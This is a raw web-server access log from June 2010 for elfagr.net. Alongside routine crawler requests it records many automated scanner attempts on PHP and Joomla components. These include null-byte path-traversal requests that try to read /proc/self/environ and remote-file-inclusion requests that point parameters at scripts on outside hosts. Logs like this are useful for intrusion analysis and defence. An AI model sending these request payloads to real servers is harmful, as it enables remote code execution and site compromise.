174.121.64.34 - - [17/Jun/2010:01:48:52 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.121.64.34 - - [17/Jun/2010:01:48:42 -0700] "GET /logs//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
93.158.149.32 - - [17/Jun/2010:01:50:03 -0700] "GET /logs/access_100506.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
66.249.17.117 - - [17/Jun/2010:01:50:52 -0700] "GET / HTTP/1.1" 200 1465 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; GTB5; .NET CLR 1.1.4322)" "www.elfagr.net"
174.121.64.34 - - [17/Jun/2010:01:52:28 -0700] "GET /logs/access.log//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.121.64.34 - - [17/Jun/2010:01:52:38 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.121.64.34 - - [17/Jun/2010:01:52:28 -0700] "GET /logs//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
173.236.139.35 - - [17/Jun/2010:01:58:39 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
173.236.139.35 - - [17/Jun/2010:02:09:26 -0700] "GET /logs/access.log//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
173.236.139.35 - - [17/Jun/2010:02:09:26 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
173.236.139.35 - - [17/Jun/2010:02:09:36 -0700] "GET /logs//index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "elfagr.net"
219.240.36.36 - - [17/Jun/2010:02:11:15 -0700] "GET /logs/access_100121.log/*?option=com_mambatstaff&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
219.240.36.36 - - [17/Jun/2010:02:11:27 -0700] "GET /*?option=com_mambatstaff&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
219.240.36.36 - - [17/Jun/2010:02:11:19 -0700] "GET /logs/*?option=com_mambatstaff&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
109.71.41.45 - - [17/Jun/2010:02:14:55 -0700] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.tbcslough.org.uk/libraries/tcpdf/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
109.71.41.45 - - [17/Jun/2010:02:14:55 -0700] "GET /logs/access_091126.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.tbcslough.org.uk/libraries/tcpdf/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
109.71.41.45 - - [17/Jun/2010:02:14:55 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.tbcslough.org.uk/libraries/tcpdf/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
216.227.215.90 - - [17/Jun/2010:02:14:57 -0700] "GET /logs/access_091126.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://valdez.at.ua/botscan/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
216.227.215.90 - - [17/Jun/2010:02:14:57 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://valdez.at.ua/botscan/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
216.227.215.90 - - [17/Jun/2010:02:15:07 -0700] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://valdez.at.ua/botscan/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
109.71.41.45 - - [17/Jun/2010:02:14:58 -0700] "GET /logs/access.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.tbcslough.org.uk/libraries/tcpdf/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
216.227.215.90 - - [17/Jun/2010:02:15:12 -0700] "GET /logs/access.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://valdez.at.ua/botscan/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
200.175.239.226 - - [17/Jun/2010:02:25:04 -0700] "GET /logs/access_100121.log///index.php?option=com_contact&Itemid.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
200.175.239.226 - - [17/Jun/2010:02:25:14 -0700] "GET /logs///index.php?option=com_contact&Itemid.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
200.175.239.226 - - [17/Jun/2010:02:25:14 -0700] "GET //index.php?option=com_contact&Itemid.absolute.path=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
66.99.17.62 - - [17/Jun/2010:02:27:50 -0700] "GET /?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.805" "elfagr.net"
66.99.17.62 - - [17/Jun/2010:02:30:55 -0700] "GET /logs/access.log/?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
66.99.17.62 - - [17/Jun/2010:02:30:55 -0700] "GET /?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.805" "elfagr.net"
66.99.17.62 - - [17/Jun/2010:02:31:05 -0700] "GET /logs/?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5943 "-" "libwww-perl/5.805" "elfagr.net"
220.181.94.231 - - [17/Jun/2010:02:40:33 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.elfagr.net"
220.181.94.231 - - [17/Jun/2010:02:40:43 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.elfagr.net"
67.195.115.166 - - [17/Jun/2010:02:49:21 -0700] "GET /tmp/?D=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "elfagr.net"
87.117.220.133 - - [17/Jun/2010:03:05:09 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
87.117.220.133 - - [17/Jun/2010:03:05:00 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
87.117.220.133 - - [17/Jun/2010:03:06:49 -0700] "GET /logs/access.log/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
87.117.220.133 - - [17/Jun/2010:03:06:59 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
87.117.220.133 - - [17/Jun/2010:03:06:49 -0700] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
87.117.220.133 - - [17/Jun/2010:03:07:17 -0700] "GET /logs/access.log/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
87.117.220.133 - - [17/Jun/2010:03:07:27 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
87.117.220.133 - - [17/Jun/2010:03:07:18 -0700] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
87.117.220.133 - - [17/Jun/2010:03:08:53 -0700] "GET /logs/access.log/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
87.117.220.133 - - [17/Jun/2010:03:08:43 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
87.117.220.133 - - [17/Jun/2010:03:08:53 -0700] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
87.117.220.133 - - [17/Jun/2010:03:09:00 -0700] "GET /logs/access.log/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
87.117.220.133 - - [17/Jun/2010:03:09:00 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
87.117.220.133 - - [17/Jun/2010:03:09:00 -0700] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.820" "elfagr.net"
124.115.6.17 - - [17/Jun/2010:03:19:51 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "elfagr.net"
174.46.190.110 - - [17/Jun/2010:03:27:16 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.46.190.110 - - [17/Jun/2010:03:27:16 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.46.190.110 - - [17/Jun/2010:03:27:07 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.46.190.110 - - [17/Jun/2010:03:27:07 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.46.190.110 - - [17/Jun/2010:03:27:07 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.46.190.110 - - [17/Jun/2010:03:27:07 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.apbs.pl/images/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
66.249.65.72 - - [17/Jun/2010:03:28:20 -0700] "GET /index_files/image002.gif HTTP/1.1" 200 5991 "-" "Googlebot-Image/1.0" "www.elfagr.net"
66.249.65.72 - - [17/Jun/2010:03:28:33 -0700] "GET /index_files/image455.gif HTTP/1.1" 200 50050 "-" "Googlebot-Image/1.0" "www.elfagr.net"
66.249.65.72 - - [17/Jun/2010:03:28:26 -0700] "GET /index_files/image4551.gif HTTP/1.1" 200 1880 "-" "Googlebot-Image/1.0" "www.elfagr.net"
67.15.152.183 - - [17/Jun/2010:03:33:48 -0700] "GET /logs/access.log/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
67.15.152.183 - - [17/Jun/2010:03:33:44 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
67.15.152.183 - - [17/Jun/2010:03:33:54 -0700] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
202.147.196.227 - - [17/Jun/2010:03:34:09 -0700] "GET /logs/access.log/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
202.147.196.227 - - [17/Jun/2010:03:34:09 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
202.147.196.227 - - [17/Jun/2010:03:34:00 -0700] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
67.15.152.183 - - [17/Jun/2010:03:36:10 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
202.147.196.227 - - [17/Jun/2010:03:41:23 -0700] "GET /logs/access.log/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
202.147.196.227 - - [17/Jun/2010:03:41:24 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
202.147.196.227 - - [17/Jun/2010:03:41:26 -0700] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
67.15.152.183 - - [17/Jun/2010:03:45:06 -0700] "GET /logs/access.log/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
67.15.152.183 - - [17/Jun/2010:03:44:56 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
67.15.152.183 - - [17/Jun/2010:03:44:57 -0700] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
202.147.196.227 - - [17/Jun/2010:03:47:48 -0700] "GET /logs/access.log/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
202.147.196.227 - - [17/Jun/2010:03:47:49 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
202.147.196.227 - - [17/Jun/2010:03:48:00 -0700] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
202.147.196.227 - - [17/Jun/2010:03:49:10 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:03:50:11 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
88.191.94.188 - - [17/Jun/2010:03:50:21 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
88.191.94.188 - - [17/Jun/2010:03:50:21 -0700] "GET /index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:03:50:29 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:03:51:33 -0700] "GET /index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:03:51:37 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
94.198.96.3 - - [17/Jun/2010:03:53:33 -0700] "GET /?option=com_gcalendar&controller=http://www.ebusinesslendingllc.com/data/krid1.txt?? HTTP/1.1" 200 1465 "-" "Mozilla/5.0" "elfagr.net"
94.198.96.3 - - [17/Jun/2010:03:53:43 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.ebusinesslendingllc.com/data/krid1.txt?? HTTP/1.1" 200 5943 "-" "Mozilla/5.0" "elfagr.net"
94.198.96.3 - - [17/Jun/2010:03:53:33 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.ebusinesslendingllc.com/data/krid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:03:53:38 -0700] "GET /logs/access.log//index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:03:53:39 -0700] "GET /index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:03:53:39 -0700] "GET /logs//index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:03:53:59 -0700] "GET /logs/access.log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:03:54:09 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:03:53:59 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
94.198.96.3 - - [17/Jun/2010:03:55:21 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.ebusinesslendingllc.com/data/krid1.txt?? HTTP/1.1" 200 5943 "-" "Mozilla/5.0" "elfagr.net"
94.198.96.3 - - [17/Jun/2010:03:55:22 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.ebusinesslendingllc.com/data/krid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
94.198.96.3 - - [17/Jun/2010:03:55:32 -0700] "GET /?option=com_gcalendar&controller=http://www.ebusinesslendingllc.com/data/krid1.txt?? HTTP/1.1" 200 1465 "-" "Mozilla/5.0" "elfagr.net"
94.198.96.3 - - [17/Jun/2010:04:00:27 -0700] "GET /?option=com_gcalendar&controller=http://www.ebusinesslendingllc.com/data/krid1.txt?? HTTP/1.1" 200 1465 "-" "Mozilla/5.0" "elfagr.net"
94.198.96.3 - - [17/Jun/2010:04:00:17 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.ebusinesslendingllc.com/data/krid1.txt?? HTTP/1.1" 200 5943 "-" "Mozilla/5.0" "elfagr.net"
94.198.96.3 - - [17/Jun/2010:04:00:17 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.ebusinesslendingllc.com/data/krid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.218.116.169 - - [17/Jun/2010:04:03:38 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "elfagr.net"
220.181.7.118 - - [17/Jun/2010:04:06:17 -0700] "GET / HTTP/1.1" 200 1465 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "elfagr.net"
94.198.96.3 - - [17/Jun/2010:04:06:42 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.ebusinesslendingllc.com/data/krid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
94.198.96.3 - - [17/Jun/2010:04:09:18 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.ebusinesslendingllc.com/data/krid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:04:10:53 -0700] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:04:10:43 -0700] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:04:10:53 -0700] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:04:10:43 -0700] "GET /bbs//delete_all.php?board_skin_path=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:04:10:43 -0700] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.205.85.5 - - [17/Jun/2010:04:10:44 -0700] "GET /bbs//delete_all.php?board_skin_path=http://www.linkeate.pe/old/idxx.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:04:12:08 -0700] "GET /logs/access.log/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:04:12:08 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:04:12:08 -0700] "GET /logs/index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
94.198.96.3 - - [17/Jun/2010:04:15:05 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.ebusinesslendingllc.com/data/krid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:04:16:33 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:04:16:23 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.62.66 - - [17/Jun/2010:04:16:33 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
216.129.119.43 - - [17/Jun/2010:04:20:03 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "elfagr.net"
88.191.94.188 - - [17/Jun/2010:04:21:38 -0700] "GET /logs/access.log/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
